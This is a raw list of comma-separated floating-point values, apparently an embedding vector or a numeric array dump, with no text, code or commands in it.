-0.01923571527004242, 0.0010029219556599855, 0.01156181562691927, -0.015100255608558655, 0.027870673686265945, -0.00026688462821766734, 0.030084019526839256, -0.00861311610788107, -0.016702018678188324, -0.017473775893449783, 0.013636826537549496, 0.012559277005493641, 0.004503137897700071, -0.020094843581318855, 0.0015908416826277971, 0.0129087520763278, -0.0104114580899477, 0.01660008728504181, 0.002491833409294486, -0.00094558612909168, 0.01658552698791027, -0.016221489757299423, 0.02005115896463394, -0.03716089949011803, -0.01777956821024418, -0.010294966399669647, -0.015930259600281715, -0.009151890873908997, -0.005984768271446228, -0.013447526842355728, 0.0007094171014614403, 0.0000036225949315848993, -0.005744503811001778, -0.01700780913233757, 0.01426297053694725, 0.02229362726211548, 0.004142741207033396, -0.011306989938020706, 0.00888978410512209, 0.014328496530652046, 0.02637084200978279, -0.007965129800140858, 0.02979278936982155, -0.022046081721782684, 0.013163578696548939, 0.0000509367418999318, 0.010120228864252567, 0.004310198128223419, 0.00503099150955677, 0.013068928383290768, -0.020094843581318855, 0.0015335058560594916, -0.02056081034243107, 0.009843560867011547, 0.021550990641117096, -0.01259568054229021, -0.010891987010836601, -0.01502744760364294, 0.013979021459817886, -0.013287350535392761, 0.013411123305559158, -0.014226566068828106, 0.01632341928780079, 0.006982229650020599, 0.02664751000702381, -0.017925182357430458, 0.014940079301595688, -0.014503234066069126, 0.006010251119732857, 0.0012395459925755858, -0.020458880811929703, 0.02672031708061695, -0.0005496958619914949, -0.014969201758503914, -0.010280405171215534, 0.02111414633691311, -0.026909615844488144, 0.021696606650948524, -0.015842890366911888, -0.004259232897311449, 0.030433494597673416, 0.004266513977199793, -0.02262854017317295, -0.0067892903462052345, 0.023152753710746765, -0.000346290209563449, 0.01630885899066925, -0.030113141983747482, 0.022191695868968964, -0.03462719917297363, 0.0028504098299890757, -0.013382000848650932, 0.021478183567523956, -0.012413661926984787, 0.01569727621972561, -0.010418739169836044, -0.006487139500677586, 0.004073574207723141, -0.015988506376743317, -0.001728265662677586, 0.02069186419248581, 0.018143605440855026, 0.00484169228002429, -0.03229736536741257, 0.027506636455655098, -0.01951238326728344, -0.021216077730059624, -0.02338573709130287, 0.02310906909406185, -0.022104326635599136, -0.014561480842530727, -0.00930478610098362, 0.0015972123946994543, 0.002049528295174241, -0.008467501029372215, -0.027987165376544, -0.014241128228604794, -0.011539973318576813, 0.02450697124004364, 0.010928391478955746, -0.0025883030612021685, -0.014663410373032093, 0.00011785698006860912, 0.01687675528228283, 0.02054624818265438, -0.007819514721632004, -0.012763137929141521, -0.02693873830139637, 0.008176270872354507, 0.011576376855373383, 0.026603825390338898, -0.0006516262656077743, -0.03401561826467514, 0.022264502942562103, 0.008882503025233746, -0.006043014582246542, 0.02312363125383854, -0.019264837726950645, -0.0022679506801068783, 0.017575707286596298, -0.018915362656116486, -0.02373521402478218, 0.024769078940153122, -0.012304451316595078, -0.014037267304956913, -0.017444653436541557, 0.012879629619419575, -0.006727403961122036, 0.021055901423096657, -0.004834411665797234, 0.029516121372580528, 0.004139100667089224, 0.009938210248947144, 0.006443454883992672, 0.012471907772123814, -0.00032695074332877994, 0.0070331948809325695, 0.024070126935839653, -0.004372084513306618, -0.009632418863475323, 0.009865403175354004, 0.026560140773653984, -0.0017473776824772358, -0.009501365944743156, -0.012311731465160847, -0.015173062682151794, 0.009363031946122646, -0.01978905126452446, -0.0033054561354219913, -0.03366614133119583, 0.03713177517056465, 0.009559611789882183, -0.008037936873733997, -0.0064179725013673306, -0.03174402564764023, 0.012551995925605297, -0.026123296469449997, 0.0129087520763278, -0.010695407167077065, 0.007571969646960497, -0.008023375645279884, 0.008860660716891289, 0.007069598883390427, -0.015493415296077728, 0.0024263067170977592, -0.010178474709391594, 0.008256359025835991, 0.002828567521646619, -0.024594340473413467, 0.021973274648189545, 0.011496288701891899, -0.032879821956157684, -0.0062941997312009335, -0.0013533076271414757, -0.020007474347949028, 0.03506404533982277, -0.024273987859487534, 0.016774825751781464, -0.03215174749493599, -0.010629881173372269, 0.013986301608383656, 0.0014916416257619858, -0.0018356565851718187, -0.0020477082580327988, 0.0012795900693163276, 0.01221708208322525, 0.0045541031286120415, 0.030084019526839256, 0.02284696325659752, -0.02326924540102482, -0.0024117452558130026, -0.003689515171572566, 0.016920439898967743, -0.004171864129602909, -0.016148682683706284, 0.0014661590103060007, -0.019250277429819107, -0.004725200589746237, 0.02928313799202442, 0.00382602890022099, 0.010972075164318085, -0.006927624344825745, -0.02603592723608017, 0.015930259600281715, -0.01156181562691927, -0.01273401454091072, -0.031831394881010056, 0.024827323853969574, -0.02736102230846882, -0.008438377641141415, 0.008766011334955692, 0.006829334422945976, 0.01610499806702137, -0.012195239774882793, -0.009188294410705566, -0.01502744760364294, -0.021915027871727943, -0.0032526706345379353, -0.01132155116647482, -0.00751372380182147, 0.016367103904485703, 0.00906452164053917, 0.015624468214809895, 0.010790056549012661, 0.0002247928496217355, 0.009384874254465103, -0.001014753128401935, -0.010345932096242905, -0.0038879152853041887, 0.0033327587880194187, -0.016352541744709015, 0.03471456840634346, -0.010294966399669647, -0.0040262495167553425, 0.0044084880501031876, 0.008219955489039421, -0.005162044893950224, 0.007014993112534285, -0.002122335834428668, -0.02185678295791149, -0.0008814246393740177, -0.013534896075725555, 0.009872683323919773, 0.011365235783159733, -0.003127077827230096, 0.01993466727435589, 0.0004179599927738309, -0.0015480674337595701, -0.0027084352914243937, -0.01595938205718994, 0.027302775532007217, -0.004299276974052191, 0.00951592717319727, -0.020240457728505135, -0.000071897309680935, -0.024492410942912102, -0.020662739872932434, 0.003085213713347912, -0.005973847582936287, 0.01461244560778141, -0.015566222369670868, -0.013331035152077675, 0.009333908557891846, -0.002886813599616289, 0.026967862620949745, 0.003409206634387374, 0.027826989069581032, -0.023968197405338287, -0.01687675528228283, 0.0288899764418602, -0.02957436628639698, -0.013564019463956356, 0.004117258824408054, -0.0031470998656004667, 0.010476985014975071, -0.001865689642727375, -0.008933467790484428, 0.005682617891579866, 0.00036813243059441447, 0.02589031308889389, 0.02319643832743168, 0.014146477915346622, 0.03005489520728588, 0.01575552113354206, -0.0029414191376417875, 0.009690665639936924, -0.0050783162005245686, -0.02117239311337471, -0.01617780514061451, -0.016745703294873238, -0.02749207429587841, -0.02310906909406185, 0.000016452766431029886, 0.017735883593559265, 0.015639029443264008, -0.0035621020942926407, 0.007400872651487589, -0.04540269449353218, 0.012508311308920383, -0.029268575832247734, 0.02736102230846882, 0.013993582688272, -0.03506404533982277, -0.02310906909406185, 0.009312067180871964, -0.011314270086586475, 0.015872012823820114, 0.03555913642048836, -0.005613450892269611, -0.005948364734649658, -0.005464195739477873, -0.008001533336937428, -0.02374977432191372, 0.012246205471456051, -0.000968338456004858, -0.020022036507725716, 0.012348135001957417, -0.010884706862270832, -0.00989452563226223, 0.030433494597673416, -0.011962256394326687, 0.010120228864252567, 0.0067201233468949795, 0.020939409732818604, 0.02583206631243229, -0.013658668845891953, -0.007855918258428574, -0.000049002796004060656, -0.00992364902049303, 0.014182882383465767, -0.012828663922846317, -0.0014561479911208153, -0.0030360687524080276, -0.014379462227225304, -0.006953106727451086, 0.013017963618040085, -0.005566125735640526, 0.006996791344136, -0.0010174834169447422, -0.0013660489348694682, 0.024172058328986168, 0.001980361295863986, 0.00787776056677103, 0.00999645609408617, 0.007499162573367357, -0.008241797797381878, 0.006043014582246542, 0.013403843156993389, -0.0013059828197583556, 0.008314604870975018, 0.03089946135878563, -0.006650956347584724, -0.004062653053551912, -0.006705561652779579, 0.006079418119043112, 0.004266513977199793, -0.000807252072263509, -0.026982422918081284, -0.022337311878800392, -0.00760109256953001, 0.046334631741046906, 0.01378244161605835, 0.01304708607494831, -0.006035733502358198, 0.0041281795129179955, -0.007521004881709814, -0.0316566601395607, -0.004950903356075287, 0.013331035152077675, 0.010928391478955746, 0.010214878246188164, 0.029472436755895615, 0.022366434335708618, -0.015813767910003662, -0.009086363948881626, -0.011154093779623508, -0.016061313450336456, 0.01228988915681839, 0.0018538584699854255, 0.002096853218972683, -0.026967862620949745, -0.006144944578409195, 0.002581022446975112, -0.003012406174093485, 0.015915697440505028, -0.0027958042919635773, 0.0007239786209538579, 0.012814102694392204, 0.00239536352455616, -0.009741630405187607, -0.0031034154817461967, 0.0014124636072665453, -0.013112612999975681, 0.007753988262265921, -0.004302917513996363, 0.0004823490453418344, -0.014940079301595688, 0.011226901784539223, 0.012835945002734661, -0.006286919116973877, 0.019250277429819107, -0.009181013330817223, -0.01430665422230959, -0.002766681369394064, -0.011074005626142025, 0.0058355131186544895, -0.0014197443379089236, -0.003039709059521556, 0.0018729703733697534, -0.015493415296077728, 0.0033764431718736887, 0.0029086556751281023, 0.022934332489967346, -0.0069640278816223145, -0.005376826506108046, 0.007302582263946533, -0.008125306107103825, -0.01909010112285614, -0.00640341080725193, -0.03777248039841652, 0.0021769413724541664, 0.02111414633691311, -0.004004407208412886, -0.008897064253687859, 0.009843560867011547, -0.028147341683506966, 0.023997319862246513, -0.009035398252308369, -0.000517387583386153, -0.00235167914070189, -0.005697179120033979, -0.014212004840373993, 0.0007412703707814217, -0.0034692727494984865, -0.012056905776262283, 0.015886574983596802, 0.00892618764191866, -0.017648514360189438, -0.00607577757909894, -0.0017664895858615637, 0.004750682972371578, -0.0037040766328573227, 0.01488911360502243, 0.01485271006822586, 0.01502744760364294, -0.0115254120901227, -0.003500215942040086, -0.006061216350644827, -0.015100255608558655, -0.007673900108784437, -0.0036767737474292517, 0.027725059539079666, 0.01686219498515129, -0.004492216743528843, -0.00150074262637645, 0.011678307317197323, 0.004728840664029121, -0.025103991851210594, -0.012675768695771694, -0.006388849578797817, 0.005930162966251373, 0.024142934009432793, -0.014430426992475986, -0.008314604870975018, 0.011103129014372826, -0.0020367871038615704, -0.013360158540308475, 0.01798342913389206, 0.02075010910630226, 0.015478854067623615, 0.03220999613404274, 0.0041973465122282505, -0.004208267666399479, -0.006396130193024874, -0.027594005689024925, 0.012413661926984787, -0.00008987163892015815, 0.007142405956983566, -0.002970542060211301, -0.0022388275247067213, 0.008059779182076454, -0.013454807922244072, -0.02484188601374626, 0.012974279001355171, -0.03060823120176792, -0.013447526842355728, -0.0021314367186278105, -0.0022679506801068783, -0.016745703294873238, 0.016075873747467995, 0.004856253508478403, -0.013549457304179668, 0.010753653012216091, -0.0054496340453624725, -0.021070461720228195, -0.013141736388206482, 0.00492906104773283, -0.003640370210632682, 0.0022970736026763916, 0.014044547453522682, -0.004608708433806896, -0.004998228047043085, -0.0026119656395167112, 0.0010902908397838473, 0.011306989938020706, 0.010768215171992779, -0.00926838256418705, -0.0115254120901227, -0.0011876707430928946, 0.0050637549720704556, 0.01304708607494831, -0.020735548809170723, 0.017109738662838936, -0.00354936090297997, -0.002235187217593193, 0.012107870541512966, 0.004954543896019459, -0.009537769481539726, -0.003229008289054036, 0.009435839019715786, 0.020444318652153015, -0.004357522819191217, 0.006913062650710344, -0.005267615430057049, -0.001771040027961135, 0.04650937020778656, 0.005780907813459635, 0.013571299612522125, -0.02275959402322769, -0.011496288701891899, -0.013986301608383656, -0.002644728869199753, -0.013316473923623562, -0.014838148839771748, -0.01597394421696663, 0.0007562868995591998, 0.0064543760381639, -0.005267615430057049, 0.021492745727300644, 0.02874436229467392, -0.011787518858909607, -0.002810365753248334, -0.018696941435337067, 0.00008628814975963905, -0.0034674524795264006, -0.009705226868391037, -0.0020549888722598553, -0.00926838256418705, 0.027754181995987892, 0.017808690667152405, 0.007484600879251957, 0.010382335633039474, -0.0015125737991183996, -0.008620396256446838, -0.008547589182853699, 0.007855918258428574, -0.02881716936826706, 0.004386646207422018, -0.00955233070999384, 0.010811898857355118, 0.00811802502721548, 0.0034947553649544716, -0.025249607861042023, -0.015639029443264008, -0.013760599307715893, -0.016643771901726723, 0.002415385562926531, 0.0025828424841165543, 0.02194415032863617, 0.0047834464348852634, -0.032442979514598846, 0.013928055763244629, -0.015886574983596802, 0.007746707648038864, 0.005027350969612598, -0.00801609456539154, 0.00906452164053917, 0.00585007481276989, 0.011168655939400196, -0.0033764431718736887, -0.007899602875113487, 0.005562485661357641, 0.00965426117181778, -0.012857787311077118, -0.01204962469637394, -0.043567948043346405, -0.003458351595327258, 0.020604494959115982, 0.0016390766249969602, 0.0036967957857996225, 0.0014170140493661165, -0.004830771125853062, -0.0074773202650249004, -0.0053950282745063305, 0.003796905977651477, -0.001474349875934422, -0.008656799793243408, -0.007346266880631447, 0.014284811913967133, -0.006731044501066208, -0.00119768176227808, -0.02255573309957981, 0.027302775532007217, -0.007044116035103798, -0.023487668484449387, 0.02041519619524479, 0.0009992816485464573, 0.03643282502889633, 0.009807157330214977, -0.002644728869199753, -0.007291661109775305, 0.020080281421542168, -0.013338316231966019, -0.02721540629863739, 0.0004054462187923491, 0.005129281431436539, -0.0043939268216490746, -0.023152753710746765, -0.03340403735637665, -0.004659673664718866, 0.007109642960131168, 0.027608567848801613, 0.023516790941357613, 0.003771423362195492, -0.000020647723431466147, -0.001220434089191258, -0.0038187482859939337, -0.02854050137102604, -0.024477848783135414, 0.011343393474817276, 0.016206927597522736, 0.000942855840548873, -0.013309192843735218, -0.009909087792038918, -0.02144906111061573, -0.004674235358834267, 0.0024062846787273884, -0.005304019432514906, -0.005595248658210039, 0.003913397900760174, -0.0007198831881396472, 0.015420608222484589, 0.0048526134341955185, -0.0012586580123752356, 0.004863534588366747, 0.008744169026613235, -0.012544715777039528, -0.004444892052561045, 0.028424009680747986, 0.019876420497894287, 0.004950903356075287, 0.01440130453556776, -0.0054532745853066444, 0.004142741207033396, 0.03937424346804619, 0.02555539831519127, 0.0074627585709095, 0.015842890366911888, -0.022468363866209984, -0.016993246972560883, -0.012086029164493084, 0.014597884379327297, 0.03322929888963699, 0.030287878587841988, 0.013134455308318138, -0.0006074867560528219, 0.0034674524795264006, 0.005122000817209482, 0.001013843109831214, 0.00035357094020582736, -0.001358768087811768, -0.021783974021673203, -0.01180208008736372, 0.004499497357755899, 0.006246875040233135, -0.002586483024060726, -0.016498157754540443, 0.00742635503411293, 0.007156967651098967, -0.009945491328835487, 0.00482713058590889, -0.013811564072966576, 0.031190691515803337, 0.000874598918017, -0.02922489121556282, -0.016003066673874855, 0.024754516780376434, -0.007579250726848841, 0.004976385738700628, 0.005111079663038254, -0.006072137504816055, -0.028977345675230026, -0.027113476768136024, -0.0235313531011343, -0.007036835420876741, 0.033083684742450714, 0.003760502440854907, 0.010739091783761978, -0.01638166606426239, 0.00030988649814389646, -0.01713886298239231, -0.01665833406150341, -0.02118695341050625, 0.008008814416825771, 0.00359304528683424, 0.016469035297632217, -0.007848638109862804, -0.003711357247084379, 0.017269914969801903, -0.006250515580177307, 0.004131820052862167, -0.025715574622154236, 0.022584855556488037, 0.018973609432578087, 0.014830867759883404, -0.01582833006978035, -0.00511836027726531, -0.0035384397488087416, 0.008037936873733997, 0.00010852853301912546, -0.01468525268137455, -0.019148346036672592, 0.0018747906433418393, -0.013760599307715893, -0.013367438688874245, -0.020706424489617348, -0.02137625403702259, -0.0008231786778196692, 0.007266178727149963, -0.021361691877245903, -0.0208229161798954, 0.0033090964425355196, -0.004586866125464439, -0.01910466141998768, -0.025395222008228302, 0.003483834210783243, -0.01929396204650402, -0.010702688246965408, -0.028584185987710953, -0.032938070595264435, 0.01163462270051241, -0.023866266012191772, 0.008489343337714672, -0.003298175288364291, -0.007550127804279327, -0.01481630653142929, 0.01437218114733696, -0.01728447712957859, -0.029807349666953087, -0.0016226950101554394, 0.008147148415446281, -0.006217752117663622, 0.01228988915681839, -0.002007664181292057, 0.008096182718873024, -0.011234181933104992, -0.0007763089379295707, 0.006603631190955639, 0.002278871601447463, -0.012093309313058853, 0.02762312814593315, 0.011605500243604183, -0.010899268090724945, 0.027943480759859085, -0.0015398765681311488, 0.003361881710588932, -0.002857690444216132, -0.007382670417428017, -0.03491843119263649, -0.0018784309504553676, 0.011882168240845203, 0.002528236946091056, -0.003669493133202195, 0.008431097492575645, 0.00971978809684515, -0.011095847934484482, -0.002171480795368552, -0.013403843156993389, 0.000432521483162418, -0.0009792596101760864, -0.014525076374411583, -0.0010657183593139052, -0.008802414871752262, -0.00244632875546813, 0.01437218114733696, 0.002282512141391635, -0.0042519522830843925, 0.01502744760364294, 0.010003737173974514, 0.017648514360189438, -0.010629881173372269, 0.01485271006822586, 0.015114816837012768, -0.003276333212852478, 0.015668153762817383, -0.014554199762642384, 0.006589069962501526, -0.022817838937044144, 0.004899938125163317, 0.008940748870372772, 0.0067346845753490925, 0.020007474347949028, 0.0019967430271208286, 0.002834028098732233, 0.03136542811989784, 0.011991378851234913, -0.017590267583727837, -0.005056473892182112, 0.013898933306336403, 0.006032093428075314, 0.018143605440855026, 0.02653101645410061, -0.011132251471281052, 0.0032599514815956354, -0.0030324282124638557, -0.025118554010987282, 0.03014226444065571, -0.004241031128913164, -0.016556402668356895, -0.019628874957561493, 0.010826461017131805, 0.000589284929446876, -0.0008718686294741929, 0.0025646407157182693, -0.03468544781208038, 0.0006825693999417126, 0.0014971022028476, -0.01658552698791027, -0.006549025885760784, -0.013491211459040642, 0.0002884993446059525, -0.0013806103961542249, 0.01686219498515129, -0.011496288701891899, -0.01910466141998768, -0.012333573773503304, 0.004051731899380684, -0.02428855001926422, 0.008729607798159122, 0.001774680451489985, 0.018289219588041306, -0.005172966048121452, -0.0016490876441821456, 0.0007348997169174254, -0.03535527363419533, -0.0020386073738336563, -0.018711501732468605, 0.023691529408097267, 0.008001533336937428, -0.022803278639912605, 0.0027939840219914913, 0.025933995842933655, -0.016410788521170616, 0.009981894865632057, 0.024492410942912102, -0.009151890873908997, -0.013993582688272, -0.010709969326853752, -0.028511378914117813, 0.0015480674337595701, 0.01708061620593071, 0.02597768045961857, 0.0035074965562671423, -0.03223911672830582, 0.03739388287067413, -0.0067201233468949795, 0.004157302435487509, -0.013003402389585972, 0.006239594426006079, 0.020356949418783188, -0.02373521402478218, 0.01986186020076275, -0.0064216130413115025, -0.008766011334955692, -0.011270585469901562, 0.0037204583641141653, -0.005999329965561628, 0.015187623910605907, 0.022613979876041412, -0.0036531114019453526, -0.003931599669158459, -0.02402644231915474, 0.010302247479557991, 0.005464195739477873, 0.020167650654911995, -0.02950155921280384, 0.015580784529447556, -0.02102677710354328, -0.016920439898967743, -0.02651645615696907, 0.01785237528383732, -0.015362361446022987, 0.0056098103523254395, 0.005114720202982426, -0.004423049744218588, -0.011110409162938595, 0.009290224872529507, -0.002792163984850049, -0.006392490118741989, -0.005249413661658764, 0.004750682972371578, 0.006785649806261063, -0.005562485661357641, 0.02811821922659874, -0.0030815734062343836, 0.00926838256418705, -0.024958377704024315, 0.001059347647242248, 0.01610499806702137, -0.0001114294573199004, -0.00961785763502121, -0.006174067500978708, 0.024885570630431175, 0.011714710853993893, -0.005828232504427433, -0.008059779182076454, 0.013491211459040642, -0.030782969668507576, 0.0032836138270795345, 0.0043393210507929325, 0.0074773202650249004, 0.003456531325355172, -0.012311731465160847, 0.02555539831519127, 0.0140227060765028, 0.021987834945321083, 0.012340854853391647, 0.022730471566319466, -0.004175504669547081, -0.02248292602598667, 0.011896729469299316, -0.01253015361726284, -0.013804283924400806, 0.005263975355774164, -0.002184221986681223, -0.0019712604116648436, -0.005424151662737131, -0.017400968819856644, -0.010003737173974514, 0.022599417716264725, -0.0001027835751301609, 0.004787086509168148, -0.02970542013645172, -0.016367103904485703, 0.018289219588041306, 0.010578915476799011, 0.0035093168262392282, 0.009712507016956806, 0.008525746874511242, -0.005577046889811754, -0.009261101484298706, -0.02548259124159813, 0.017677636817097664, -0.02290520817041397, 0.002400824101641774, -0.0038151079788804054, -0.015639029443264008, 0.005194808356463909, -0.01639622636139393, -0.0011021220125257969, 0.017866935580968857, 0.0003096589935012162, -0.013382000848650932, 0.00460142781957984, 0.001777410740032792, -0.0064179725013673306, -0.027579443529248238, -0.021754851564764977, 0.015595345757901669, -0.0010757293784990907, -0.0007348997169174254, -0.013098051771521568, 0.03646194562315941, 0.004306558053940535, 0.011256024241447449, 0.011889448389410973, 0.006687359884381294, 0.019264837726950645, 0.012122432701289654, -0.001037505455315113, -0.0031179769430309534, -0.013425684534013271, -0.02117239311337471, 0.0025901233311742544, -0.013207262381911278, -0.016367103904485703, -0.005831873044371605, -0.006308761425316334, 0.015872012823820114, -0.023778896778821945, -0.022861523553729057, 0.01381884515285492, 0.01610499806702137, 0.013411123305559158, -0.005132921971380711, 0.014037267304956913, -0.0423739068210125, -0.0013223644345998764, 0.0024517893325537443, -0.00036380949313752353, -0.002930497983470559, 0.03206437826156616, 0.008591273799538612, 0.020735548809170723, -0.033141929656267166, 0.00923925917595625, 0.025307852774858475, -0.013906213454902172, -0.008212675340473652, -0.023982757702469826, 0.0023170956410467625, -0.0194395761936903, 0.01715342327952385, 0.009901806712150574, 0.01458332221955061, -0.03631633147597313, 0.011088567785918713, 0.005340422969311476, 0.009173732250928879, -0.021507306024432182, 0.011481727473437786, -0.02207520417869091, -0.0021769413724541664, 0.024521533399820328, -0.00363672967068851, -0.013622265309095383, -0.021565552800893784, -0.010214878246188164, 0.008205394260585308, 0.013491211459040642, 0.00012900560977868736, -0.006589069962501526, 0.010527950711548328, -0.020371511578559875, -0.006712842267006636, -0.026749439537525177, 0.0027120758313685656, -0.020167650654911995, 0.008773292414844036, 0.013316473923623562, -0.012107870541512966, 0.00007718722190475091, 0.006825693883001804, -0.013003402389585972, -0.0005829142755828798, 0.007972410880029202, 0.00690942257642746, 0.017517460510134697, 0.011998659931123257, -0.010076544247567654, 0.004506777971982956, 0.006068496964871883, -0.005074676126241684, -0.0019403172191232443, 0.0035329791717231274, 0.01743009127676487, 0.01453963853418827, 0.018653256818652153, -0.012086029164493084, -0.000016893593056011014, 0.004583226051181555, -0.003116156905889511, -0.004328399896621704, 0.02318187616765499, -0.005999329965561628, -0.009137328714132309, -0.0025446186773478985, 0.009246540255844593, 0.017328161746263504, 0.009319347329437733, -0.00640341080725193, -0.0016463573556393385, 0.009181013330817223, 0.0030014852527529, -0.007124204188585281, -0.034190356731414795, 0.00043411413207650185, 0.016163242980837822, 0.006971308961510658, -0.005001868586987257, -0.004863534588366747, -0.010702688246965408, -0.023560475558042526, -0.013986301608383656, -0.012741295620799065, -0.019949227571487427, 0.025511713698506355, 0.011845764704048634, 0.02736102230846882, -0.02165292203426361, 0.006745605729520321, 0.017866935580968857, 0.008125306107103825, 0.019963789731264114, -0.015114816837012768, 0.014532357454299927, 0.01381884515285492, 0.0032872541341930628, 0.01207874808460474, -0.005919241812080145, -0.014925517141819, 0.024681709706783295, 0.0056789773516356945, -0.019177470356225967, -0.005227571353316307, -0.001080279820598662, -0.005551564507186413, -0.003898836439475417, -0.005515160504728556, -0.003946161363273859, -0.017167985439300537, -0.005209369584918022, -0.0028194666374474764, -0.01811448112130165, -0.010841022245585918, -0.01577008329331875, -0.011314270086586475, -0.007080520037561655, 0.009690665639936924, 0.048693589866161346, 0.002930497983470559, -0.0017164344899356365, 0.016512718051671982, 0.004961824510246515, -0.020735548809170723, -0.006072137504816055, 0.01610499806702137, -0.0017728602979332209, -0.008096182718873024, 0.009355750866234303, 0.0007963309762999415, 0.010535230860114098, 0.016410788521170616, 0.007335345726460218, 0.007521004881709814, -0.0028886336367577314, 0.006381568964570761, -0.011918571777641773, 0.02500206232070923, 0.00492906104773283, 0.00631604203954339, 0.002164199948310852, -0.004808928817510605, -0.007364468649029732, 0.0007435455918312073, -0.009588735178112984, 0.0203423872590065, 0.026618385687470436, -0.020109403878450394, 0.012369977310299873, 0.008918906562030315, 0.02222081832587719, 0.02450697124004364, -0.017546584829688072, 0.003957082517445087, -0.017794128507375717, 0.002229726640507579, 0.010069264099001884, -0.004834411665797234, 0.011365235783159733, 0.007921445183455944, 0.011467166244983673, 0.012974279001355171, -0.016745703294873238, 0.022089766338467598, 0.011889448389410973, 0.012828663922846317, 0.0004714279202744365, -0.00955233070999384, -0.00941399671137333, 0.004492216743528843, -0.001405182876624167, -0.008045217953622341, -0.0028686115983873606, -0.0035366194788366556, -0.026836808770895004, -0.007379030343145132, 0.00475432351231575, 0.003412846941500902, 0.01748833805322647, 0.007928726263344288, 0.013149016536772251, -0.011095847934484482, 0.01002557948231697, 0.005675336811691523, 0.003938880283385515, -0.0038151079788804054, -0.0012368157040327787, 0.005198448430746794, -0.016920439898967743, -0.002186042256653309, -0.01999291218817234, 0.0009992816485464573, 0.0029468797147274017, -0.005526081658899784, -0.009559611789882183, -0.003840590361505747, 0.0008523016585968435, -0.005464195739477873, 0.018711501732468605, 0.013658668845891953, 0.0032071659807115793, -0.005970207042992115, -0.01006198301911354, -0.01201322115957737, -0.01190401054918766, 0.010746372863650322, 0.011678307317197323, 0.0024772719480097294, -0.01846395805478096, 0.017619391903281212, 0.0052202907390892506, 0.02791435830295086, -0.009494084864854813, -0.008867941796779633, -0.0031689421739429235, -0.0029341382905840874, -0.005471476353704929, 0.0009555971482768655, 0.009319347329437733, 0.01868237927556038, 0.0144449882209301, 0.005511520430445671, -0.014532357454299927, -0.009108206257224083, 0.021128708496689796, 0.019949227571487427, -0.008503904566168785, 0.013993582688272, -0.005657135043293238, -0.0053804670460522175, -0.005580687429755926, -0.019599752500653267, -0.01604675129055977, -0.0014625187031924725, -0.010724530555307865, -0.004557743202894926, -0.0014661590103060007, -0.0024081047158688307, 0.014452269300818443, -0.02408468909561634, -0.005580687429755926, 0.008307324722409248, -0.005722661968320608, 0.0025318774860352278, 0.008030656725168228, -0.007415433879941702, -0.013112612999975681, 0.0032399294432252645, -0.02006571926176548, 0.047878146171569824, 0.011539973318576813, -0.0284676942974329, -0.017896059900522232, 0.044470760971307755, -0.004386646207422018, 0.020255019888281822, 0.012537434697151184, 0.014452269300818443, 0.04123811423778534, 0.00968338456004858, -0.022410118952393532, 0.01009838655591011, -0.0005233032279647887, 0.006508981809020042, -0.00595200527459383, 0.012835945002734661, -0.013331035152077675, -0.01191129069775343, -0.01728447712957859, -0.004666954278945923, -0.001914834720082581, -0.019701683893799782, 0.007029554806649685, -0.008773292414844036, -0.014350338838994503, -0.026268910616636276, 0.01632341928780079, -0.015624468214809895, 0.004575945436954498, 0.024448726326227188, -0.004961824510246515, 0.0006466207560151815, -0.0037750639021396637, 0.016774825751781464, -0.01451051514595747, 0.017881497740745544, 0.016498157754540443, -0.010717249475419521, 0.010018298402428627, 0.006385209038853645, 0.00906452164053917, -0.013236385770142078, 0.025220483541488647, -0.007579250726848841, -0.018449395895004272, 0.022046081721782684, -0.005671696737408638, -0.016833070665597916, -0.00975619163364172, 0.0013533076271414757, -0.0032144468277692795, -0.004051731899380684, -0.006388849578797817, -0.016993246972560883, -0.01687675528228283, 0.017954304814338684, 0.005486037582159042, -0.016702018678188324, -0.02714259922504425, 0.01722623221576214, -0.007022273726761341, 0.022686786949634552, 0.014066389761865139, 0.007826795801520348, 0.004543181974440813, -0.011357954703271389, -0.0029632612131536007, -0.004004407208412886, -0.013993582688272, 0.0006944005726836622, 0.012413661926984787, -0.003978924360126257, -0.003946161363273859, 0.0059884088113904, -0.005930162966251373, -0.0027102555613964796, 0.013454807922244072, 0.013797002844512463, 0.015580784529447556, -0.008598553948104382, -0.011685588397085667, 0.013374719768762589, 0.01839114911854267, -0.00322718801908195, -0.009071802720427513, 0.03069560043513775, 0.002287972718477249, -0.018624134361743927, 0.03395737335085869, -0.016891317442059517, 0.015216747298836708, -0.019759928807616234, -0.0013223644345998764, 0.0009920008014887571, 0.018871678039431572, 0.024405041709542274, -0.009486804716289043, 0.0016281555872410536, -0.022861523553729057, 0.015857452526688576, 0.007870480418205261, -0.013789721764624119, 0.01180208008736372, 0.00579910958185792, 0.025526275858283043, 0.012020502239465714, 0.006053935270756483, 0.007863199338316917, 0.0020568091422319412, -0.004139100667089224, 0.006865737959742546, -0.018769748508930206, 0.0011175936087965965, 0.019046416506171227, -0.005373186431825161, 0.0005328591796569526, -0.016556402668356895, -0.010294966399669647, 0.007892322726547718, 0.002701154677197337, 0.012755856849253178, 0.0012268046848475933, -0.0009801696287468076, -0.019818175584077835, 0.016687456518411636, -0.011583657935261726, -0.0016418069135397673, -0.016425350680947304, 0.0004978206125088036, -0.009013555943965912, -0.005263975355774164, -0.014998325146734715, 0.0076156542636454105, -0.006112181581556797, -0.011583657935261726, -0.013068928383290768, 0.015595345757901669, -0.003964363131672144, 0.00811802502721548, 0.00930478610098362, 0.030287878587841988, 0.020255019888281822, 0.011569095775485039, -0.009690665639936924, 0.011969536542892456, 0.013673230074346066, -0.005930162966251373, 0.016003066673874855, -0.012821383774280548, -0.006414331961423159, 0.00978531502187252, -0.01201322115957737, -0.003771423362195492, 0.008067060261964798, -0.006538104731589556, 0.001773770316503942, 0.0004518609493970871, 0.008263640105724335, -0.003178043058142066, -0.015318677760660648, -0.013229104690253735, -0.005125640891492367, -0.01818728819489479, 0.015100255608558655, 0.005544283892959356, -0.02693873830139637, 0.01777956821024418, 0.031132444739341736, 0.007732145953923464, -0.005919241812080145, -0.01512937806546688, -0.007950568571686745, -0.01722623221576214, 0.004288355819880962, 0.01769219897687435, 0.005555204581469297, -0.003978924360126257, -0.005071035586297512, -0.013571299612522125, 0.039199505001306534, 0.006155865732580423, 0.005435072351247072, -0.02174028940498829, -0.010476985014975071, 0.0050783162005245686, 0.012712172232568264, 0.0038806344382464886, -0.0069494666531682014, -0.012996121309697628, -0.011751114390790462, 0.023895390331745148, -0.008241797797381878, 0.01769219897687435, 0.011256024241447449, 0.000010011017366196029, -0.005435072351247072, -0.013403843156993389, -0.013651387766003609, -0.02248292602598667, -0.008074341341853142, 0.01100847963243723, 0.020298704504966736, 0.00709872180595994, 0.007681180723011494, 0.010498827323317528, 0.01020031701773405, 